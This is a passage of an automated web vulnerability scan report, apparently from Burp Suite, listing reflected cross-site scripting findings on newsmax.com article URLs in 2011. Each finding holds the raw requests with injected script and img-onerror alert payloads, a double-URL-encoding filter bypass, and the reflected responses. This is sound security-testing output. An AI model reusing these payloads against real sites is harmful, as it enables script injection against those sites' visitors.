<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   10 Be
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletes/2011/03/17cd299' a=b b0170ee1c24/id/371695'
class="article_tools_link">
...[SNIP]...

1.53. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5912%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e26bbc82e1fc was submitted in the REST URL parameter 7. This input was echoed as b5912"><img src=a onerror=alert(1)>26bbc82e1fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695b5912%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e26bbc82e1fc HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41414
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:15:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href="javascript:printPage(371695b5912"><img src=a onerror=alert(1)>26bbc82e1fc);"
class="article_tools_link">
...[SNIP]...

1.54. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c062f'%20a%3db%20d7e89e2c5c9 was submitted in the REST URL parameter 7. This input was echoed as c062f' a=b d7e89e2c5c9 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695c062f'%20a%3db%20d7e89e2c5c9 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 40970
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:15:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695c062f' a=b d7e89e2c5c9'
class="article_tools_link">
...[SNIP]...

1.55. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82e4b"><script>alert(1)</script>284a7cdfb01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695?82e4b"><script>alert(1)</script>284a7cdfb01=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46377
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   10 Be
...[SNIP]...
<a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695?82e4b"><script>alert(1)</script>284a7cdfb01=1')"
class="article_tools_link">
...[SNIP]...

1.56. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3b62'><script>alert(1)</script>c7eed70c3cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695?b3b62'><script>alert(1)</script>c7eed70c3cb=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46372
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   10 Be
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695?b3b62'><script>alert(1)</script>c7eed70c3cb=1'
class="article_tools_link">
...[SNIP]...

1.57. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fe5d1'%20a%3db%20781c4f4a53e was submitted in the REST URL parameter 2. This input was echoed as fe5d1' a=b 781c4f4a53e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5fe5d1'%20a%3db%20781c4f4a53e/2011/03/17/id/389851 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45883
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Top 5
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5fe5d1' a=b 781c4f4a53e/2011/03/17/id/389851'
class="article_tools_link">
...[SNIP]...

1.58. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 476bb'%20a%3db%209d3ff8534c5 was submitted in the REST URL parameter 3. This input was echoed as 476bb' a=b 9d3ff8534c5 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011476bb'%20a%3db%209d3ff8534c5/03/17/id/389851 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45883
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Top 5
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011476bb' a=b 9d3ff8534c5/03/17/id/389851'
class="article_tools_link">
...[SNIP]...

1.59. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 162c9'%20a%3db%200e66b1b4ab0 was submitted in the REST URL parameter 4. This input was echoed as 162c9' a=b 0e66b1b4ab0 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03162c9'%20a%3db%200e66b1b4ab0/17/id/389851 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45883
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Top 5
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03162c9' a=b 0e66b1b4ab0/17/id/389851'
class="article_tools_link">
...[SNIP]...

1.60. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cdc78'%20a%3db%2071ab5e4ca06 was submitted in the REST URL parameter 5. This input was echoed as cdc78' a=b 71ab5e4ca06 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17cdc78'%20a%3db%2071ab5e4ca06/id/389851 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45883
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Top 5
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17cdc78' a=b 71ab5e4ca06/id/389851'
class="article_tools_link">
...[SNIP]...

1.61. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89858'%20a%3db%20f00bb1a6af5 was submitted in the REST URL parameter 7. This input was echoed as 89858' a=b f00bb1a6af5 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/38985189858'%20a%3db%20f00bb1a6af5 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41622
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/38985189858' a=b f00bb1a6af5'
class="article_tools_link">
...[SNIP]...

1.62. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c524%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ebda1408e22f was submitted in the REST URL parameter 7. This input was echoed as 4c524"><img src=a onerror=alert(1)>bda1408e22f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/3898514c524%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ebda1408e22f HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 42066
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href="javascript:printPage(3898514c524"><img src=a onerror=alert(1)>bda1408e22f);"
class="article_tools_link">
...[SNIP]...

1.63. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49787'><script>alert(1)</script>a43f963cc7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851?49787'><script>alert(1)</script>a43f963cc7a=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46105
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Top 5
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851?49787'><script>alert(1)</script>a43f963cc7a=1'
class="article_tools_link">
...[SNIP]...

1.64. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3dfa"><script>alert(1)</script>8b1dee82801 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851?a3dfa"><script>alert(1)</script>8b1dee82801=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46110
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Top 5
...[SNIP]...
javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851?a3dfa"><script>alert(1)</script>8b1dee82801=1')"
class="article_tools_link">
...[SNIP]...

1.65. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964

Issue detail

